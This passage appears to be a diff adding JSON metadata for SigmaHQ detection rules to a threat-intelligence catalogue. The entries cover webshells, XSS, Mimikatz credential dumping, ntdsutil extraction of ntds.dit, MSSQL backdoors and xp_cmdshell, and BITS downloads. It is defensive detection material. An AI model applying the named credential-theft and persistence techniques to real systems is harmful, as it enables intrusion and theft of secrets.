"https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2017/02/19", + "filename": "web_win_webshells_in_access_logs.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User 
searches in search boxes of the respective website" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings", + "meta": { + "refs": [ + "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags", + "creation_date": "2021/08/15", + "filename": "web_xss_in_access_logs.yml", + "author": "Saw Win Naung, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "value": "Mimikatz Use", + "meta": { + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" + ], + "tags": [ + "attack.s0002", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.001", + "attack.t1003.006" + ], + "creation_date": "2017/01/10", + "filename": "win_alert_mimikatz_keywords.yml", + "author": "Florian Roth (rule), David ANDRE (additional 
keywords)", + "level": "high", + "falsepositive": [ + "Naughty administrators", + "AV Signature updates", + "Files with Mimikatz in their filename" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "value": "Audit CVE Event", + "meta": { + "refs": [ + "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2020/01/15", + "filename": "win_audit_cve.yml", + "author": "Florian Roth, Zach Mathis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection method points out highly relevant Antivirus events", + "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", + "value": "Relevant Anti-Virus Event", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + 
"https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ], + "creation_date": "2017/02/19", + "filename": "win_av_relevant_match.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Some software piracy tools (key generators, cracks) are classified as hack tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "An application has been removed. Check if it is critical.", + "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", + "value": "Application Uninstalled", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2022/01/28", + "filename": "win_builtin_remove_application.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "value": "Ntdsutil Abuse", + "meta": { + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_esent_ntdsutil_abuse.yml", + "author": "Nasreddine 
Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", + "value": "Dump Ntds.dit To Suspicious Location", + "meta": { + "refs": [ + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_esent_ntdsutil_abuse_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects MSI package installation from suspicious locations", + "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "value": "MSI Installation From Suspicious Locations", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/31", + "filename": "win_msi_install_from_susp_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some false positives may occur depending on the environnement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects installation of a remote msi file from web.", + "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "value": "MSI Installation From Web", + "meta": { + "refs": [ + "https://twitter.com/_st0pp3r_/status/1583922009842802689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.t1218.007" + ], + "creation_date": "2022/10/23", + "filename": "win_msi_install_from_web.yml", + "author": "Stamatis Chatzimangou", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", + "value": "MSSQL Add Account To Sysadmin Role", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_add_sysadmin_account.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "value": "MSSQL Disable Audit Settings", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + 
"https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_disable_audit_settings.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "value": "MSSQL Extended Stored Procedure Backdoor Maggie", + "meta": { + "refs": [ + "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2022/10/09", + "filename": "win_mssql_sp_maggie.yml", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "level": "high", + "falsepositive": [ + "Legitimate extended stored procedures named maggie" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "value": "MSSQL SPProcoption Set", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_sp_procoption_set.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use of the feature by administrators (rare)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "uuid": "7f103213-a04e-4d59-8261-213dddf22314", + "value": "MSSQL XPCmdshell Suspicious Execution", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/12", + "filename": "win_mssql_xp_cmdshell_audit_log.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", + "value": "MSSQL 
XPCmdshell Option Change", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/12", + "filename": "win_mssql_xp_cmdshell_change.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "value": "Atera Agent Installation", + "meta": { + "refs": [ + "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" + ], + "tags": [ + "attack.t1219" + ], + "creation_date": "2021/09/01", + "filename": "win_software_atera_rmm_agent_install.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Legitimate Atera agent installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects backup catalog deletions", + "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", + "value": "Backup Catalog Deleted", + "meta": { + "refs": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + 
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2017/05/12", + "filename": "win_susp_backup_delete.yml", + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "uuid": "6c82cf5c-090d-4d57-9188-533577631108", + "value": "Microsoft Malware Protection Engine Crash", + "meta": { + "refs": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ], + "creation_date": "2017/05/09", + "filename": "win_susp_msmpeng_crash.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", + "value": "CVE-2020-0688 Exploitation via Eventlog", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/29", + "filename": "win_vul_cve_2020_0688.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/11/22", + "filename": "win_vul_cve_2021_41379.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other MSI packages for which your admins have used that name" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", + "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "value": "File Was Not Allowed To Run", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" + ], + "creation_date": "2020/06/28", + "filename": "win_applocker_file_was_not_allowed_to_run.yml", + "author": "Pushkarev Dmitry", + "level": "medium", + "falsepositive": [ + "Need tuning applocker or add exceptions in SIEM" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/28", + "filename": "win_bits_client_susp_domain.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": "win_bits_client_susp_local_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No 
established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/28", + "filename": "win_bits_client_susp_local_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": 
"win_bits_client_susp_powershell_job.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": "win_bits_client_susp_use_bitsadmin.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/10", + "filename": "win_bits_client_uncommon_domain.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", + "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "value": "Code Integrity Attempted DLL Load", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1483810148602814466", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/01/20", + "filename": "win_codeintegrity_attempted_dll_load.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Antivirus products" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocked load attempts of revoked drivers", + "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "value": "Block Load Of Revoked Driver", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/11/10", + "filename": "win_codeintegrity_revoked_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "value": "Code Integrity Blocked Driver Load", + "meta": { + "refs": [ + 
"https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/11/10", + "filename": "win_codeintergiry_blocked_driver_load.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "value": "Loading Diagcab Package From Remote Path", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate package hosted on a known and authorized remote location" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "value": "GALLIUM Artefacts - Builtin", + "meta": { + "refs": [ + 
"https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "win_apt_gallium.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/08", + "filename": "win_susp_dns_config.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects plugged USB devices", + "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "value": "USB Device Plugged", + "meta": { + "refs": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + 
